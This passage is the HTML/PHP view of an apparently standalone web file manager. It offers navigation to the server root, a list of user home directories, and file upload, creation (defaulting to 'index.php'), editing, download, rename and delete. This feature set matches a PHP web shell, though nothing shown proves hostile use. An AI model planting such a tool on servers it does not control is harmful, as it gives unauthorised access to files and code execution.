class="sb-head"> <div class="sb-label">Current Directory</div> <div class="sb-path"><strong><?php echo htmlspecialchars(basename($currentPath)?:'/'); ?></strong><br><?php echo htmlspecialchars($currentPath); ?></div> <div class="sb-counters"> <div class="sb-counter"> <div class="num"><?php echo $totalDirs; ?></div> <div class="lbl">Dirs</div> </div> <div class="sb-counter"> <div class="num"><?php echo $totalFiles; ?></div> <div class="lbl">Files</div> </div> </div> </div> <nav class="sb-nav"> <div class="sb-section-label">Quick Nav</div> <form method="GET" style="display:contents;"> <button type="submit" name="path" value="/" class="sb-item <?php echo $currentPath==='/'?'active':''; ?>"> Root <span class="itype">/</span> </button> </form> <form method="GET" style="display:contents;"> <button type="submit" name="path" value="/home" class="sb-item <?php echo $currentPath==='/home'?'active':''; ?>"> Home <span class="itype">/home</span> </button> </form> <form method="GET" style="display:contents;"> <button type="submit" name="path" value="<?php echo FM_ROOT_PATH; ?>" class="sb-item <?php echo $currentPath===realpath(FM_ROOT_PATH)?'active':''; ?>"> Script <span class="itype">dir</span> </button> </form> <?php if (!empty($userDirs)): ?> <div class="sb-section-label" style="margin-top:8px;">Users</div> <?php foreach ($userDirs as $ud): ?> <form method="GET" style="display:contents;"> <button type="submit" name="path" value="<?php echo htmlspecialchars($ud); ?>" class="sb-item <?php echo $currentPath===realpath($ud)?'active':''; ?>"> <?php echo htmlspecialchars(basename($ud)); ?> <span class="itype">usr</span> </button> </form> <?php endforeach; ?> <?php endif; ?> </nav> </aside> <!-- MAIN --> <main class="main"> <!-- NAV BAR --> <div class="nav-bar"> <nav class="breadcrumb"> <a href="?path=/">~</a> <?php foreach ($bc as $crumb): ?> <span class="bsep">/</span> <a href="?path=<?php echo urlencode($crumb['path']); ?>"><?php echo htmlspecialchars($crumb['name']); ?></a> <?php endforeach; ?> </nav> <form method="GET" class="path-form"> <input type="text" name="path" placeholder="/navigate/to/path" value="<?php echo htmlspecialchars($currentPath); ?>"> <button type="submit">GO</button> </form> </div> <!-- ACTION BAR --> <div class="action-bar"> <button onclick="openModal('upModal')" class="act primary">+ Upload</button> <button onclick="openModal('mkdirModal')" class="act">+ Dir</button> <button onclick="openModal('mkfileModal')" class="act">+ File</button> </div> <?php if ($message): ?> <div class="flash <?php echo $messageType; ?>"> <?php echo $messageType==='success'?'✓':'✗'; ?> <?php echo htmlspecialchars($message); ?> </div> <?php endif; ?> <!-- FILE LIST --> <div class="file-area"> <?php if (empty($items)): ?> <div class="empty"> <div class="e-label">EMPTY</div> <p>This directory contains no files</p> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th style="width:50px">EXT</th> <th>Name</th> <th style="width:80px">Size</th> <th style="width:110px">Date</th> <th style="width:60px">Mode</th> <th style="width:200px">Actions</th> </tr> </thead> <tbody> <?php foreach ($items as $item): ?> <tr> <td> <span class="ext-tag <?php echo $item['is_dir']?'is-dir':''; ?>"> <?php echo htmlspecialchars($item['ext']); ?> </span> </td> <td> <div class="name-cell"> <span class="fname"> <?php if ($item['is_dir']): ?> <a href="?path=<?php echo urlencode($currentPath.'/'.$item['name']); ?>" class="isdir"><?php echo htmlspecialchars($item['name']); ?></a> <?php else: ?> <a href="javascript:void(0)"><?php echo htmlspecialchars($item['name']); ?></a> <?php endif; ?> </span> </div> </td> <td class="size"><?php echo htmlspecialchars($item['size']); ?></td> <td class="date"> <?php echo htmlspecialchars($item['date']); ?> <div class="t"><?php echo htmlspecialchars($item['time']); ?></div> </td> <td class="perm"><?php echo htmlspecialchars($item['perms']); ?></td> <td> <div class="row-acts"> <?php if (!$item['is_dir'] && isEditableFile($item['name'])): ?> <a href="?path=<?php echo urlencode($currentPath); ?>&edit=<?php echo urlencode($item['name']); ?>" class="ract ract-edit">Edit</a> <?php endif; ?> <?php if (!$item['is_dir']): ?> <a href="?path=<?php echo urlencode($currentPath); ?>&download=<?php echo urlencode($item['name']); ?>" class="ract ract-dl">DL</a> <?php endif; ?> <?php if ($item['name']!=='..' && $item['name']!=='.'): ?> <button onclick="openRename('<?php echo htmlspecialchars(addslashes($item['name'])); ?>')" class="ract ract-ren">Ren</button> <button onclick="openDelete('<?php echo htmlspecialchars(addslashes($item['name'])); ?>')" class="ract ract-del">Del</button> <?php endif; ?> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; ?> </div> </main> </div> <!-- UPLOAD MODAL --> <div id="upModal" class="backdrop"> <div class="modal"> <div class="modal-head"> <h3>Upload</h3> <button class="close-btn" onclick="closeModal('upModal')">✕</button> </div> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="csrf_token" value="<?php echo $csrf; ?>"> <div class="modal-body"> <label class="m-label">Select File (max <?php echo FM_MAX_UPLOAD_SIZE_MB; ?>MB)</label> <input type="file" name="upload_file" required class="m-input" style="padding:10px 14px;font-size:12px;"> </div> <div class="m-actions" style="padding:0 24px 24px;"> <button type="submit" class="m-btn m-btn-ok">Upload →</button> <button type="button" onclick="closeModal('upModal')" class="m-btn m-btn-cancel">Cancel</button> </div> </form> </div> </div> <!-- MKDIR MODAL --> <div id="mkdirModal" class="backdrop"> <div class="modal"> <div class="modal-head"> <h3>New Dir</h3> <button class="close-btn" onclick="closeModal('mkdirModal')">✕</button> </div> <form method="POST"> <input type="hidden" name="csrf_token" value="<?php echo $csrf; ?>"> <div class="modal-body"> <label class="m-label">Directory Name</label> <input type="text" name="folder_name" placeholder="my-directory" required class="m-input"> </div> <div class="m-actions" style="padding:0 24px 24px;"> <button type="submit" name="create_folder" class="m-btn m-btn-ok">Create →</button> <button type="button" onclick="closeModal('mkdirModal')" class="m-btn m-btn-cancel">Cancel</button> </div> </form> </div> </div> <!-- MKFILE MODAL --> <div id="mkfileModal" class="backdrop"> <div class="modal"> <div class="modal-head"> <h3>New File</h3> <button class="close-btn" onclick="closeModal('mkfileModal')">✕</button> </div> <form method="POST"> <input type="hidden" name="csrf_token" value="<?php echo $csrf; ?>"> <div class="modal-body"> <label class="m-label">File Name</label> <input type="text" name="file_name" placeholder="index.php" required class="m-input"> </div> <div class="m-actions" style="padding:0 24px 24px;"> <button type="submit" name="create_file" class="m-btn m-btn-ok">Create →</button> <button type="button" onclick="closeModal('mkfileModal')" class="m-btn m-btn-cancel">Cancel</button> </div> </form> </div> </div> <!-- RENAME MODAL --> <div id="renModal" class="backdrop"> <div class="modal"> <div class="modal-head"> <h3>Rename</h3> <button class="close-btn" onclick="closeModal('renModal')">✕</button> </div> <form method="POST"> <input type="hidden" name="csrf_token" value="<?php echo $csrf; ?>"> <input type="hidden" name="old_name" id="renOld"> <div class="modal-body"> <label class="m-label">New Name</label> <input type="text" name="new_name" id="renNew" required class="m-input"> </div> <div class="m-actions" style="padding:0 24px 24px;"> <button type="submit" name="rename_item" class="m-btn m-btn-ok">Rename →</button> <button type="button" onclick="closeModal('renModal')" class="m-btn m-btn-cancel">Cancel</button> </div> </form> </div> </div> <!-- DELETE MODAL --> <div id="delModal" class="backdrop"> <div class="modal"> <div class="modal-head"> <h3>Delete</h3> <button class="close-btn" onclick="closeModal('delModal')">✕</button> </div> <form method="POST"> <input type="hidden" name="csrf_token" value="<?php echo $csrf; ?>"> <input type="hidden" name="item_name" id="delItem"> <div class="modal-body"> <div class="del-msg"> Permanently delete <strong id="delName"></strong>? This action cannot be undone. </div> </div> <div class="m-actions" style="padding:0 24px 24px;"> <button type="submit" name="delete_item" class="m-btn m-btn-del">Delete</button> <button type="button" onclick="closeModal('delModal')" class="m-btn m-btn-cancel">Cancel</button> </div> </form> </div> </div> <script> function openModal(id){document.getElementById(id).classList.add('open');} function closeModal(id){document.getElementById(id).classList.remove('open');} function openRename(n){ document.getElementById('renOld').value=n; document.getElementById('renNew').value=n; openModal('renModal'); setTimeout(()=>{document.getElementById('renNew').select();},60); } function openDelete(n){ document.getElementById('delItem').value=n; document.getElementById('delName').textContent=n; openModal('delModal'); } document.querySelectorAll('.backdrop').forEach(b=>{ b.addEventListener('click',e=>{if(e.target===b)b.classList.remove('open');}); }); document.addEventListener('keydown',e=>{ if(e.key==='Escape')document.querySelectorAll('.backdrop.open').forEach(b=>b.classList.remove('open')); }); </script> </body> </html>
Close
